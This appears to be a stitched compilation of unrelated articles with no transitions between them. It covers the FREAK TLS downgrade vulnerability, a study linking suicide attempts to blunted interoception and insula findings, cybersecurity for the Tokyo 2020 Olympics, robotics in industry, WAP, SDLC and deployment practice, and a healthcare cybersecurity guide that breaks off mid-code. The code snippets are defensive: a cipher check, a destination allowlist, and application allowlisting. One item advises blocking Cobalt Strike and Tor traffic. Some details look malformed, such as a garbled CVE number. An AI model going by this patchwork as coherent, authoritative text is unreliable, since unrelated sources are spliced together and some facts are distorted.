A newly discovered vulnerability in the SSL and TLS cryptographic protocols could allow attackers to intercept and decrypt communications between affected clients and servers. Dubbed the “FREAK” vulnerability, it facilitates man-in-the-middle (MITM) attacks against secure connections where the server accepts RSA_EXPORT cipher suites and the client either offers an RSA_EXPORT suite or uses an older, unpatched version of OpenSSL. Once the encryption is broken by the attackers, they could steal passwords and other personal information and potentially launch further attacks against the website.
FREAK was discovered by a team of security researchers, who estimated that servers supporting just under ten percent of the top 1 million Alexa-listed domains were vulnerable to attack. Among the vulnerable client types were many Android and Apple devices, a high number of embedded systems, and a range of software products.
The vulnerability lies in the fact that attackers who intercept the setting up of a secure connection between an affected server and client can force them to use “export-grade” encryption in their communications, a much weaker form of encryption than is usually used today.
Export-grade encryption is so called because of a US government policy dating from the 1990s which required cryptographic software intended for export to use 512-bit encryption or less, which was not as secure as encryption used in the domestic market. While the policy has long been abandoned, export grade encryption has continued to exist as a legacy feature in a number of SSL/TLS implementations.
Even in the late 1990s, 512-bit encryption was seen as relatively weak and, by today’s standards, it is exceptionally so and can usually be cracked within a matter of hours. The standard was long ago superseded by 1024-bit encryption, which in theory would require millions of computers working for years to crack. Despite this, 1024-bit encryption was recently phased out in favor of the far more secure 2048-bit encryption to provide even more headroom.
Advice for businesses
Web server owners are advised to disable support for export grade encryption in addition to checking that any other known insecure ciphers are also disabled. Further guidance is available here.
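For a quick client-side spot check, the sketch below (Python; "example.com" is a placeholder host) opens a TLS connection and reports which cipher suite the server negotiates, flagging EXPORT-grade or short-key suites. It is a minimal illustration rather than a full FREAK scanner, which would need to actively offer only RSA_EXPORT suites.

```python
# Rough spot-check of the cipher a server negotiates for HTTPS.
# "example.com" is a placeholder; this only reports the suite chosen
# for this one handshake and flags obviously weak choices.
import socket
import ssl

HOST = "example.com"   # placeholder domain to test
PORT = 443

context = ssl.create_default_context()
context.check_hostname = False          # we only care about the cipher here
context.verify_mode = ssl.CERT_NONE

with socket.create_connection((HOST, PORT), timeout=10) as sock:
    with context.wrap_socket(sock, server_hostname=HOST) as tls:
        name, protocol, secret_bits = tls.cipher()
        print(f"{HOST} negotiated {name} over {protocol} ({secret_bits}-bit secret)")
        if "EXPORT" in name or (secret_bits or 0) < 128:
            print("WARNING: weak or export-grade cipher suite accepted")
        else:
            print("No obviously weak suite chosen for this handshake")
```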
OpenSSL users are advised to upgrade to the latest version, OpenSSL 1.0.2, which was released on January 22 and contains a patch for the OpenSSL Man in the Middle Security Bypass Vulnerability (CVE-2015-0204).
Advice for consumers
Users of Google Android devices who are concerned about this issue are advised to use the Chrome web browser rather than the default Android browser. Google has issued a patch and users are advised to update as soon as it is made available on their device.
Users of Apple desktop and mobile devices who are concerned about this issue are advised not to use the Safari browser until a patch is issued, which is due to arrive next week. Alternative browsers such as Firefox or Chrome are not affected by the vulnerability.
Symantec has provided the following tool to verify whether or not a domain is vulnerable:
Update – March 6, 2015:
Microsoft has issued an advisory, warning that Secure Channel (also known as Schannel), the Windows implementation of SSL/TLS, is also vulnerable to FREAK attacks. Microsoft said that a security feature bypass vulnerability (CVE-2015-1637) in Schannel affects all supported releases of Windows. The vulnerability could allow an attacker to force the downgrading of the cipher suites used in an SSL/TLS connection on a Windows computer.
Users of Microsoft Windows who are concerned about this issue are advised to apply workarounds to disable the RSA export ciphers. Microsoft recommends for customers to use these workarounds to mitigate this vulnerability.
Symantec has released an Audit IPS signature (Audit: Weak Export Cipher Suite) to detect traffic from servers that accept export ciphers. As of now the signature is called “Web Attack: Weak Export Cipher Suite CVE-2015-00242” but it will be renamed to “Audit: Weak Export Cipher Suite” in the next IPS definitions release.
IPS Audit signatures are available in SEP 12.1 RU2 (released November 2012) and above. We recommend customers run our latest software version (SEP 12.1 RU5) as this contains further IPS Audit signature enhancements. SEP's IPS Audit Signatures do not block traffic, but empower SEP administrators to learn which endpoints in their network are connecting to websites using this vulnerability. The administrators can take action as they see fit (creating firewall rules, application and device Control policies, and so on).
Update – March 10, 2015:
Apple has issued a patch for iOS (8.2) and a patch for OS X (2015-002) that fixes the FREAK vulnerability. Users are advised to update and apply these patches to their Apple devices.
People who have survived a suicide attempt are less sensitive to bodily signals related to their heart and breath, and have a higher tolerance for pain, suggest new findings published today in eLife.
Accurately predicting the risk of suicide in an individual is one of the greatest challenges encountered by clinicians.
By identifying physical characteristics that differentiate people who have attempted suicide from those who have not, the study paves the way for future research aimed at identifying biological indicators of suicide risk.
Our brain constantly monitors the status of bodily signals that we need to stay alive, such as our heartbeat, our breath and pain caused by tissue damage to our skin.
‘Interoception’ describes the way the nervous system tracks the internal state of the body, helping us to perceive potential or actual threats and to act accordingly.
“Unlike most organisms, some humans are able to counteract these survival instincts through the act of suicide,” explains lead author Danielle DeVille, a PhD student at the Laureate Institute for Brain Research, Tulsa, Oklahoma, US.
“While experts have strived for decades to understand and prevent these deaths, we still don’t know enough about the factors that contribute to suicidal behaviour.”
To address this gap, DeVille and her colleagues conducted the first study that looks at whether blunted interoception is associated with a history of suicide attempts in people with psychiatric disorders, including depression, anxiety and post-traumatic stress disorder.
Their study involved 34 participants with a history of suicide attempts in the last five years as compared to a matched psychiatric reference sample of 68 participants with no history of suicide attempts.
The team examined interoceptive processing in the participants using a panel of tasks. These included a breath-hold challenge, a cold-pressor test – where an individual immerses a hand in icy water and has their heart rate and skin conductance measured – and a heartbeat perception task.
The researchers found that those who had attempted suicide tolerated the breath-hold and cold-pressor challenges for significantly longer than those who had not.
Additionally, this group was less able to accurately perceive their heartbeat than non-attempters.
“We found that this ‘interoceptive numbing’ was linked to lower brain activity in the insular cortex, a region that closely tracks the internal state of the body,” explains senior author Sahib Khalsa, Director of Clinical Operations at the Laureate Institute for Brain Research.
“This numbing was not influenced by the presence of a psychiatric disorder, by a history of having considered suicide, or by having taken psychiatric medications, and this suggests it was most closely linked to the act of attempting suicide.”
Khalsa adds that these findings come with a number of limitations, including the fact that the study did not fully examine whether a history of considering suicide, versus making an actual attempt, has an independent impact on interoception.
“It is also difficult to judge from our study whether the observed differences in interoception represent innate characteristics of the individuals involved, or whether they reflect an emerging response as they progressed from suicidal thinking to suicidal action,” he says.
Despite these limitations, the authors say their work reveals a possible role of interoceptive dysfunction in distinguishing individuals at risk of suicide.
It also lays the groundwork for further studies to determine whether measuring interoception in individuals can improve the ability to predict their suicide risk.
The insular cortex is a key hub in emotional processing, with connectivity to the prefrontal cortex (PFC), particularly the ventral PFC (VPFC), as well as mesial temporal structures.
The insula plays an important role in interoceptive awareness of positive and negative internal states, including emotional and other types of pain, and in understanding and sharing other people’s emotional states [95, 96].
Only in more recent studies have insula structure, function and related behavior been investigated for their role in suicidal thoughts and behaviors (STBs). For example, on a behavioral level, interoceptive deficits have been reported among suicide attempters (SAs) compared with individuals who only thought about or planned suicide in general psychiatric outpatient adults, and predicted the severity of suicidal ideation (SI) at 6-month follow-up in community adolescents.
Lower insula thickness was observed in adults in relation to SA in schizophrenia (SZ) and SI in major depressive disorder (MDD). Smaller insula volume was associated with higher attempt lethality and lower impulsivity in borderline personality disorder (BPD) [87, 99].
In contrast, larger insula volumes were reported in relation to attempt lethality in adults with bipolar disorder (BD). It is possible that the direction of these insula differences relates to specific characteristics of high-lethality attempters, since larger insula volumes were also found in association with a higher lifetime history of aggression in BPD.
Some findings in the PFC noted above in MDD extended to the insula, including associations of baseline 5-HT1A binding potential with SI and with the lethality of future attempts within a 2-year follow-up period, and of increased neuroinflammation (TSPO availability).
SPECT research showed higher insula rCBF at rest in adult SAs with MDD, and higher insula fMRI activation was found in adults with MDD or BD with psychotic features during a cognitive control task, with insula activity related to higher intensity of SI.
Higher insula fMRI activation was also associated with lower subjective value of gain and loss in adult SAs with MDD. Lower activation in the posterior insula during social exclusion was found in adult SAs with MDD or BD, which was suggested to indicate a higher tolerance to pain via repeated exposure to painful and provocative experiences in subjects vulnerable to suicide.
Smaller insula volume has been associated with SAs and lower impulsivity in adults across various mental disorders, whilst both smaller and larger insula volumes have been associated with higher attempt lethality.
fMRI studies found higher insular activation during reward processing and cognitive control in adult SAs with MDD, while lower insula activation was associated with a higher tolerance to social pain in adult SAs with MDD or BD.
Thus, there is preliminary evidence for an involvement of insular structural and functional alterations in SI and SAs. However, since very few studies have focussed on the insula, and both decreases and increases in insula measures have been reported, more research is needed to elucidate the role of the insula in STBs.
Interestingly, immune challenges activate interoceptive brain pathways (including the insula), triggering alterations in mood and cognition, motivation, and neurovegetative processes.
Together with preliminary evidence of increased neuroinflammation in the insula related to SI, this suggests that the insula may be an important region for future studies of neuroinflammation and STBs.
The growing reliance on IT infrastructure has resulted in increased cybersecurity requirements to plan for and mitigate possible cyber-attacks. Chris Harris, Europe, the Middle East and Africa (EMEA) Technical Director at Thales UK, discusses the type of threats that may impact the Games.
Ever since the 2004 Athens Olympic Games, cybersecurity has been a growing concern for the host nations and the International Olympic Committee (IOC). The growing reliance on IT infrastructure has resulted in increased cybersecurity requirements to plan for and mitigate possible cyber-attacks.
Even though Tokyo 2020 will be held without spectators, after Japan declared a state of emergency following a surge in COVID-19 cases, the games still depend on a great variety of cutting-edge digital infrastructure such as an AI-enabled face-to-face live translation device, face-recognition tech and ZMP’s Robot Taxi, a driverless car.
The dependence of the Tokyo 2020 Olympics on technology highlights the potential risks if a system was infiltrated. Japan and the IOC must be able to trust in the companies behind the technology, and their technical know-how and digital infrastructure.
It comes therefore as no surprise that the IOC identified cybersecurity as a priority area and announced plans to heavily invest to provide the best cybersecure environment for the games. However, the IOC noted that it would not be disclosing the specific details of their cybersecurity plan due to the nature of the topic.
Cybersecurity threats to the Olympics are not without precedent. The 2018 Winter Olympics in Pyeongchang saw the highest level of attacks. Russian hackers carried out attacks on Olympic networks before the opening ceremony, which slowed down the entry of spectators and took Wi-Fi networks offline. They also tampered with portions of the broadcast.
Historically the focus was on physical security, but as audiences grow in this ever-more connected world, the potential to disrupt or use a global event, such as the Olympic Games, as a platform for malicious, radical or misinformation purposes means that cybersecurity has needed to move center-stage to ensure the events can continue without disruption. When you have countries from across the world coming together, groups are going to try to take the opportunity to enrich themselves through crime or embarrass the host nation on the international stage.
The risks are not very different to those which businesses usually face, but the lure of such a visible stage and high-profile target means that the scale and volume of these attacks will be magnified to levels way beyond what regular corporations would see. RAND Corporation has published research highlighting the types of threats that Tokyo faces, which include:
• Targeted attacks, aimed at high-profile Olympic assets, individuals or organizations.
• Distributed denial of service (DDoS) attacks against Tokyo 2020 infrastructure or associated networks.
• Ransomware attacks which could affect a wide range of devices, services and underlying infrastructure supporting the Tokyo 2020 Olympics.
• Cyber propaganda or misinformation to damage the reputation of individuals, sponsor organisations, or the host nation.
According to the same research, the most probable threat actors are foreign intelligence services, cyber-terrorists, cyber-criminals, hacktivists or disgruntled insiders and ticket scalpers.
Preparing for the gold medal
To address this level of threat, planning is essential. Japan began preparing for the Olympics in 2015, signing partnerships with international and national organisations and agencies. For example, it has partnered with the U.S. Department of Homeland Security, NIST, and Israel’s electricity provider to manage cybersecurity concerns around critical infrastructure during the Olympics. More importantly, all of Japan’s leading corporations supporting the Olympic Games have adopted the NIST Cybersecurity Framework to align their preparedness and response with the globally accepted framework.
It is also important to note that Japan hosted the 2019 Rugby World Cup, another huge international sports event which served as a dry run for Tokyo 2020. This was a golden opportunity for the country to set a milestone before the Olympics to test its readiness and incident response capabilities in advance.
Finally, a review of Japan’s cybersecurity strategy for Tokyo 2020 showed that the country has a limited pool of cybersecurity professionals, with only 28% of IT professionals working in-house. To solve this problem, Japan trained 220 ‘ethical hackers’ in the hope of creating a more cybersecure Tokyo 2020. The same review concludes that even “if the event is held in 2021 and the pandemic still requires most of the operators to work remotely, it would be important to secure not only Tokyo 2020-related infrastructure such as electricity, transportation, and venues, but also their remote work IT environment.”
Cybersecurity is a marathon at sprint tempo
Encryption will play a larger-than-ever role in protecting the information critical to the successful and safe operation of the Games. Networks should be encrypted, so that any data captured is unreadable. Principles of Zero Trust need to be applied to ensure that people and devices within the internal network are authenticated and only granted access to the resources they need. It is not just perimeter defense which needs to be in place: every server, every data store and every IoT device tracking the movement of vehicles or shipments, or capturing video, should be delivering encrypted information to trusted locations and should only be able to communicate with the servers and services that are essential for its operation.
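As a rough illustration of that principle, the sketch below shows a device-side sender that refuses any destination not on an explicit allowlist and always wraps the connection in TLS. The host names and allowlist entries are invented placeholders, and a real deployment would enforce the same restrictions at the network layer as well.

```python
# Minimal sketch of "encrypt everything, talk only to essential services":
# refuse any destination not on an explicit allowlist and always wrap the
# socket in TLS. Host names below are illustrative placeholders.
import socket
import ssl

ALLOWED_DESTINATIONS = {
    ("telemetry.games.example", 443),
    ("updates.games.example", 443),
}

def send_telemetry(host: str, port: int, payload: bytes) -> None:
    if (host, port) not in ALLOWED_DESTINATIONS:
        raise PermissionError(f"{host}:{port} is not an approved destination")

    context = ssl.create_default_context()      # verifies the server certificate
    with socket.create_connection((host, port), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(payload)                 # data leaves the device encrypted

# Example: this raises PermissionError because the host is not allowlisted.
# send_telemetry("attacker.example", 443, b'{"temp": 21}')
```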
Finally, as ransomware attacks are on the increase, it will be important to ensure that critical systems and networks are segregated and redundant, and to ensure that backups and process-level privilege controls are in place to try and limit the threat to core systems.
Your organisation may not be under the same pressure as the Tokyo 2020 cybersecurity team, but for more information on how to protect and control sensitive data, read more about Thales’ Data Protection and Access Management solutions.
Robots might be taking over sooner or later. Maybe not in the same way it happens in television and film, but that might be for the better. Robots are usually portrayed as taking over in some outlandish way that we can’t seem to control. Instead, we are seeing different industries benefit from the advancement in robotic technology. Some of these industries may not be what you would expect to benefit from robotics. But the future of robotic technology looks bright, and so do the different industries that are applying this technology.
Much of these benefits that we are seeing from robotic technology are due to the application of artificial intelligence and machine learning. These terms are oftentimes used interchangeably, but there is a distinct difference between artificial intelligence and machine learning.
Artificial intelligence is the broader idea and application of machines carrying out assignments for humans in an “intelligent” way. Machine learning on the other hand is under the umbrella of artificial intelligence. It is an application of artificial intelligence with the model of allowing machines to learn and make decisions for themselves. Machine learning, once set up correctly, can be a self-sustaining decision-making machine.
One of the developments that have been instrumental in the advancement of artificial intelligence and machine learning is the artificial neural network. An artificial neural network is a computer system designed to work in the same manner as the human brain. It can be taught different things including recognizing images and classifying them in various ways. Artificial neural networks are vital in the way artificial intelligence and machine learning operate.
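As a toy illustration of the idea, the sketch below (Python with NumPy) trains a single artificial neuron to separate two clusters of points. Real image-recognition networks stack enormous numbers of such units, but the loop of adjusting weights based on errors is the essence of how they learn.

```python
# Toy artificial "neuron": learns to separate two clusters of 2-D points.
# Real image-recognition networks stack millions of such units; this shows
# only the basic idea of weights adjusted from prediction errors.
import numpy as np

rng = np.random.default_rng(0)

# Two clusters of points with labels 0 and 1.
points = np.vstack([rng.normal(-1.0, 0.5, (50, 2)), rng.normal(1.0, 0.5, (50, 2))])
labels = np.array([0] * 50 + [1] * 50)

weights = np.zeros(2)
bias = 0.0
learning_rate = 0.1

for _ in range(20):                      # a few passes over the data
    for x, y in zip(points, labels):
        prediction = 1 if x @ weights + bias > 0 else 0
        error = y - prediction           # -1, 0 or +1
        weights += learning_rate * error * x
        bias += learning_rate * error

accuracy = np.mean([(1 if x @ weights + bias > 0 else 0) == y for x, y in zip(points, labels)])
print(f"Learned weights {weights}, bias {bias:.2f}, training accuracy {accuracy:.0%}")
```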
The advancements in robotics have made applying the technology quite intriguing for several different industries that may not seem like an obvious pairing. Nonetheless, robotics is showing to be significant for these industries. The first industry applying robotic technology is health care.
There are several different ways the healthcare industry is applying the use of robotics. It is being used for rehabilitation purposes, patient companionship, therapy, and even surgery. Currently, robotic technology isn’t being applied to completely take over the duties of health care workers. It’s being used to make their jobs easier.
The farming and agriculture industry is also taking advantage of robotic technology. Farmers have been using driverless GPS-guided tractors and harvesters to be more efficient. This can save both time and money while making farm work less laborious. More recently, there has been research and testing of robotic technology for spraying, mowing, pruning, and weed removal. Furthermore, technological improvements in sensors are also being used to manage pests and crop disease. The current pandemic has exposed how susceptible our food supply is, but utilizing advancements in technology can prevent future food shortages.
While on the subject of food, the hospitality industry is another industry benefiting from robotics. Food preparation is very important for many different reasons. Food is what sustains us and gives us the nourishment and energy we need to do work in our perspective industries, and if not prepared properly, we run the risk of becoming sick. Food is something every industry, and more importantly, every person in the world has in common. Developments in robotic technology are making food preparation less work. There are several robotic chefs and even complete robotic kitchens that can prepare meals from start to finish. Not only can these prepare complete meals for you, saving time and energy, but they can also curate meals according to different diets and lifestyles.
Robotic technology is being implemented in manufacturing. One of the easiest ways to utilize the power of robotic technology is in helping manufacturing workers do tedious and repetitive tasks. So far, in manufacturing, robotic technology isn’t being used to take the place of human workers, but to help make their job easier. Advancements in technology have also made working with robotic machines safer. Sensors, cameras, and systems programmed to turn off in emergencies are making it safer.
The military has been using robotic technology for quite some time now. Artificially intelligent unmanned army drones are being used for surveillance and for supporting certain operations. It can be used to evaluate the danger in situations and give soldiers information. These artificial intelligent drones can be used to do certain tasks without putting human soldiers in danger. There have been moral questions regarding self-governing weapons using artificial intelligence, which will be long debated.
Data centers are also utilizing the power of robotic technology for security purposes. Security is one of the most important aspects of a data center’s operations, and the industry is looking to apply innovations in robotic technology to increase data center security.
There have been several data center security innovations recently. Biometric technology (facial recognition, fingerprint scanning, and retina scanning) are being used to identify the people entering restricted areas in the data center. Artificial intelligence is also being used to detect cybercriminals from breaching cybersecurity systems.
But one of the most intriguing innovations has been how data centers are utilizing robotic technology for security. A data center company called Switch is deploying autonomous robots as added security guards. Sentry is a security robot that has a 360-degree camera, sensors that can scan visitors, and are built to climb curbs and stairs. It can monitor the inside of a data center and the outside of the data center building as well. These robots are fully autonomous but can be controlled by humans as well.
Technological advancements in robotics are changing the way many different industries operate. Industries such as healthcare, farming, hospitality and food, manufacturing, military, and the data center industry are all finding ways to utilize the power of robotics. All of these industries are taking advantage of robotics making operations more efficient. Robotics isn't looking to take jobs away from workers in these different industries, but instead, makes certain jobs less tedious and easier. The developments in robotic technologies are making the future of many different industries brighter than they were yesterday.
A Wireless Application Protocol (WAP) is an old standard that allowed early mobile phones to access the Internet through something called a WAP Gateway. The WAP Gateway identified the device that was connecting to the Internet and could format the content sent to the device to match the screen size and type in use. It was cumbersome, failed more often than it got the screen rendered correctly and is no longer in use.
This standard was created by four companies: Ericsson, Motorola, Nokia, and Unwired Planet (now Phone.com). The protocol has become obsolete as newer cell phones can access the Internet no differently than your desktop or laptop computer.
Source: CNSSI 4009
Does an SMB need to be concerned with WAP?
No. WAP is an outdated technology that was largely controlled by your mobile carrier. Today, carriers run on modern networks such as LTE and have launched their latest generation of mobile Internet access, known as 5G. 5G promises lightning-quick Internet on par with the fastest broadband networks available today.
In software engineering, we use the terms validation and verification a lot among software team members. They come up across all software project phases, and I think there is a common misconception about what the two terms mean and when to use each of them.
What is the Waterfall Model (Waterfall Methodology)?
It is mostly known as the traditional software development process model: still widely used today, the most popular SDLC model, and yet the one you should avoid using. Moreover, it was the first formally introduced presentation of the software lifecycle.
You can read this Wikipedia page to know the waterfall model history.
The Waterfall Model is a linear sequential flow, in which progress is seen as flowing steadily downwards (like a waterfall) through the phases of software implementation. This means that any phase in the development process begins only if the previous phase is complete. The waterfall approach does not define a process for going back to a previous phase to handle changes in requirements.
In this article, we will discuss the advantages and disadvantages of the waterfall model, whether we should avoid it, when to use it, its pitfalls, and why I see it as the father of the SDLC models.
Software development lifecycle models take different strategies and methodologies to the software development process. I wrote about the different types of development models; please review that article for more information, where we also discussed how to select the most suitable model based on your project context.
Regardless, what model you have selected, these models are sharing mostly the same development phases with different arrangements, a more or a less phase. Furthermore, they can be implemented in an iterative and incremental model.
In this article, we will discuss the most common phases across all SDLC models. I will add other articles to discuss each phase in detail 🙂
Software development life cycle (SDLC) is a series of phases that provide a common understanding of the software building process: how the software will be realized and developed, from the business understanding and requirements elicitation phase, through converting these business ideas and requirements into functions and features, to usage and operation that achieve the business needs. A good software engineer should have enough knowledge to choose the SDLC model suited to the project context and the business requirements.
Therefore, it may be necessary to choose the right SDLC model according to the specific concerns and requirements of the project to ensure its success. I wrote another article on how to choose the right SDLC; you can follow this link for more information. Moreover, to learn more about software testing life cycles and SDLC phases, you can follow the links highlighted here.
In this article, we will explore the different types of SDLC models, the advantages and disadvantages of each one, and when to use them.
What is Software Development?
Software development is the process of creating applications and software programs by writing and maintaining source code. It covers the complete process and the stages involved throughout the software development life cycle (SDLC).
It is a step-by-step process of inventing, specifying, coding, documenting, testing and fixing bugs, carried out to create and manage frameworks, software components or even complete applications.
Advantages of Software Deployment Tools
- Eases business processes with custom-made software solutions by enhancing in-house operations and the productivity of the organization.
- Helps in integration with the Internet of Things, ensuring connectivity with users' devices and other physical appliances to ease users' lives and improve business outcomes.
- Effective management of big data – provides capabilities to collate and understand big data through an effective and organized dashboard, helping business stakeholders analyse a wide range of metrics and identify trends to set goals more effectively.
- Choosing an experienced software development company when adopting new software infrastructure can make or break the project.
- Deploying tailor-made software can automate business processes and enable centralized management.
- In line with the modern mobile trend, applications keep businesses connected to their devices remotely, while users can access processes from any device at any time.
- Software is developed according to the client's requirements and demands. The developer gets a clear understanding of the client's goals before proposing a solution; only when the proposed solution addresses the customer's needs is the software development successful.
- Software development follows a life cycle called the SDLC (Software Development Life Cycle). The stages of the SDLC are understanding the requirements, designing, planning, implementing, testing, documenting and maintaining. Software that passes through each of the SDLC stages has a high chance of being delivered with good quality.
- Software development aims to deliver software on time. A software product loses its value when it is not delivered on time, and software delivered on time improves the return on investment.
Best Deployment in Software Practices
Implement a deployment checklist
Set up a process to follow whenever you deploy new software. A checklist helps you keep track of what must be done next so that you do not miss any of the crucial steps.
Choose the right Deployment Method
Choose software that is easy to integrate with your existing local applications and other tools.
Automated Software Deployment Process
Deploying new versions of software manually is a daunting task that introduces many opportunities for human error. Automating the deployment process mitigates the possibility of errors, increases deployment speed and streamlines the process.
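As a minimal sketch of what that automation can look like, the script below runs the same ordered steps every time and stops at the first failure. The individual commands (test runner, build tool, deployment target) are placeholders to be adapted to your own pipeline.

```python
# Minimal deployment automation sketch: run the same steps, in the same
# order, every time, and stop at the first failure. The actual commands
# (test runner, build tool, deploy target) are placeholders to adapt.
import subprocess
import sys

DEPLOY_STEPS = [
    ["python", "-m", "pytest", "--quiet"],          # run the test suite
    ["python", "-m", "build"],                      # build a release artifact
    ["rsync", "-az", "dist/", "deploy@app.example:/srv/app/releases/"],  # ship it
]

def deploy() -> None:
    for step in DEPLOY_STEPS:
        print("Running:", " ".join(step))
        result = subprocess.run(step)
        if result.returncode != 0:
            print(f"Step failed with exit code {result.returncode}; aborting deployment")
            sys.exit(result.returncode)
    print("All steps succeeded; deployment complete")

if __name__ == "__main__":
    deploy()
```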
Adopt continuous delivery
Adopting continuous delivery ensures that the code is always ready for the required deployment. This is done by running the application in a prototype (staging) environment to check that it functions properly and meets the demands before it is deployed.
Use a continuous integration server
Continuous integration is crucial for any successful agile deployment. It ensures that code that works on a developer's machine is regularly built and tested against the shared codebase, helping you avoid “integration hell”.
Healthcare cybersecurity is a strategic imperative for any organization in the medical industry — from healthcare providers to insurers to pharmaceutical, biotechnology and medical device companies. It involves a variety of measures to protect organizations from external and internal cyber attacks and ensure availability of medical services, proper operation of medical systems and equipment, preservation of confidentiality and integrity of patient data, and compliance with industry regulations.
An Industry Under Attack
The healthcare industry has historically been a primary target of cyber attacks. As of January 7, 2022, the Office for Civil Rights of the U.S. Department of Health and Human Services (HHS) was investigating 860 data breaches reported in the preceding 24 months; each breach exposed protected health information (PHI) of 500 or more individuals. One hundred nineteen (or 13.8%) of these breaches involved “Business Associates”— vendors and other third parties who had access to sensitive patient data — with the largest breach affecting 3.25 million people. According to the 2021 Cost of a Data Breach Report by IBM and Ponemon Institute, the average cost of a healthcare breach was $9.23 million, more than twice the $4.24 million average for all industries.
Threat actors view healthcare organizations as attractive targets for at least three reasons:
- Healthcare organizations have an extensive and often unprotected attack surface. In addition to attack vectors common to all enterprises, healthcare organizations deal with a wide range of connected medical devices (Internet of Medical Things, IoMT), usage of personal endpoints that may lack adequate endpoint security at healthcare facilities (BYOD), and numerous third parties having access to sensitive patient data and critical assets in hospital settings. Further, the proliferation of home working and virtual doctor’s visits (telehealth) prompted by COVID-19 and the rapidly rolled out but not always properly secured supporting IT infrastructure have created even more opportunities for attackers.
- PHI data has high value on the black market. The value of PHI to threat actors is high, due to the richness of personal information that these records contain that can be used for identity theft, healthcare insurance fraud and other malicious activities. Therefore, each medical record can fetch hundreds of dollars on the black market — a lot more than a stolen credit card number, for example.
- Breaches cause material damage (hence, victims’ greater willingness to pay attackers to free themselves from ransomware). Disruption in the work of healthcare facilities and inaccessibility of patient data that may be required to perform critical procedures can, literally, cost lives. Plus, privacy regulations like HIPAA impose massive fines for PHI disclosure. Penalties for HIPAA violations related to “privacy, security, breach notification and electronic health care transactions” can reach $1.81 million per calendar year.
Types of Attacks
According to HHS Office of Information Security’s “2020: A Retrospective Look at Healthcare Cybersecurity,” ransomware attacks accounted for almost 50% of all healthcare data breaches. In 2021, threat actors extorted from healthcare organizations ransomware payments averaging $910,335, per BakerHostetler’s 2021 Data Security Incident Response Report.
In respect of specific attack types, the 2021 Verizon Data Breach Investigations Report states that 86% of covered healthcare breaches were caused by:
- Errors (including mis-delivery)
- Web application attacks
- System intrusions, including those involving credential theft
Cybersecurity Strategies and Regulations
To help healthcare organizations safeguard critical assets and data, government and industry bodies have published compliance mandates and recommendation frameworks, such as:
- General security and privacy:
- HHS and Healthcare and Public Sector Coordinating Councils’ “Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients” provides a “common set of voluntary, consensus-based, and industry-led guidelines, best practices, methodologies, procedures, and processes” to help healthcare organizations reduce cyber risk.
- The HIPAA Security Rule establishes national standards to protect individuals’ electronic personal health information (ePHI). The Security Rule mandates compliance with administrative, physical and technical safeguards to ensure ePHI’s confidentiality, integrity and security, including, among others, access control.
- NIST’s “HIPAA Security Rule Crosswalk to NIST Cybersecurity Framework” maps HIPAA Security Rule standards and implementation specifications to applicable NIST Cybersecurity Framework sub-categories.
- Protection from ransomware:
- HHS’s “Ransomware Fact Sheet” offers specific guidance for protection against ransomware and recovery — specifically in the context of HIPAA notification rules.
- CISA’s alert (AA21-131A) “DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks” provides mitigation recommendations to reduce ransomware risks, including:
- Requiring multi-factor authentication for remote access
- Enabling strong spam filters to prevent phishing emails from reaching end users
- Implementing a user training program and simulated spear phishing attacks
- Filtering network traffic
- Updating software, including operating systems, applications and firmware
- Limiting access to resources over networks, especially by restricting RDP
- Setting antivirus or antimalware programs to conduct regular scans
- Ensuring user and process accounts are limited through account use policies, user account control and privileged account management
- Preventing unauthorized execution by:
- Implementing application allowlisting and Software Restriction Policies (SRPs); a minimal illustration of the allowlisting idea follows this list
- Disabling macros in Microsoft Office attachments
- Monitoring or blocking inbound connections from anonymization services (Tor) and post-exploitation tools (Cobalt Strike).
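To make the allowlisting idea concrete, here is a minimal sketch of the decision logic: a program may run only if the hash of its executable appears on an approved list. In practice this is enforced by operating-system controls such as SRPs or AppLocker rather than application code, and the paths and hashes below are placeholders.

```python
# Minimal illustration of application allowlisting: a program may run only
# if the SHA-256 hash of its executable is on the approved list. Real
# enforcement lives in OS controls (SRPs, AppLocker, WDAC); this sketch
# only shows the decision logic. Hashes and paths are placeholders.
import hashlib
from pathlib import Path

APPROVED_HASHES = {
    # "sha256-of-approved-ehr-client",      # placeholder entries
    # "sha256-of-approved-backup-agent",
}

def file_sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def may_execute(path: Path) -> bool:
    return file_sha256(path) in APPROVED_HASHES

candidate = Path("/usr/local/bin/some-tool")   # placeholder path
if candidate.exists():
    verdict = "allowed" if may_execute(candidate) else "blocked (not on allowlist)"
    print(f"{candidate}: {verdict}")
```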
The Importance of Protecting Data with Access, Credential Management and Privilege Controls
All healthcare cybersecurity frameworks and regulations place great importance on safeguarding access. For example, the NIST Cybersecurity Framework includes Access Control (PR.AC) and Protective Technology (PR.PT) in its “Protect” pillar. NIST prescribes that “access to assets and associated facilities” must be “limited to authorized users, processes, or devices, and to authorized activities and transactions.” This includes the following requirements specific to digital access:
- AC-1: Identities and credentials are managed for authorized devices and users.
- AC-3: Remote access is managed.
- AC-4: Access permissions are managed, incorporating the principles of least privilege and separation of duties.
- PT-3: Incorporate the principle of least functionality by configuring systems to provide only essential capabilities. This is critical to limiting the area of attack and ensuring the least privilege principle.
Protecting access is foundational to implementing a Zero Trust model and the overall defense-in-depth strategy. So, 59% of health system CIOs surveyed by Black Book Market Research for their 2020 State of the Healthcare Industry Cybersecurity Report are shifting security strategies to address user authentication and access.
Some examples of specific measures to safeguard access and privilege include the following:
- Implementing adaptive multi-factor authentication and single sign-on to prevent incidents resulting from credential compromise (a small TOTP illustration follows this list)
- Protecting access to privileged accounts to foil takeover attempts and prevent breaches
- Combining the following approaches to block unpermitted application access to sensitive data to prevent ransomware encryption:
- Application allowlisting to only allow programs explicitly permitted by security policy to execute
- Prohibiting applications (other than those specified by policy) from accessing sensitive data, even if they are allowed to run
- Removing local admin rights and enforcing least privilege on endpoints to prevent privilege escalation and restrict lateral or vertical movement
- Cataloging software and putting in place specific execution and operation policies
- Applying SRPs or other controls to prevent programs from executing from common ransomware locations
- Securing remote third-party access to reduce the risk of breaches arising from compromise of vendors, contractors, business partners and other external parties.
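As a small illustration of the multi-factor authentication item above, the sketch below uses the third-party pyotp library to verify a time-based one-time password (TOTP) alongside a normal password check. It shows only the mechanism; adaptive MFA products layer risk signals such as device and location on top, and the account details here are placeholders.

```python
# Illustration of one common second factor: a time-based one-time password
# (TOTP), verified alongside the regular password check. Requires the
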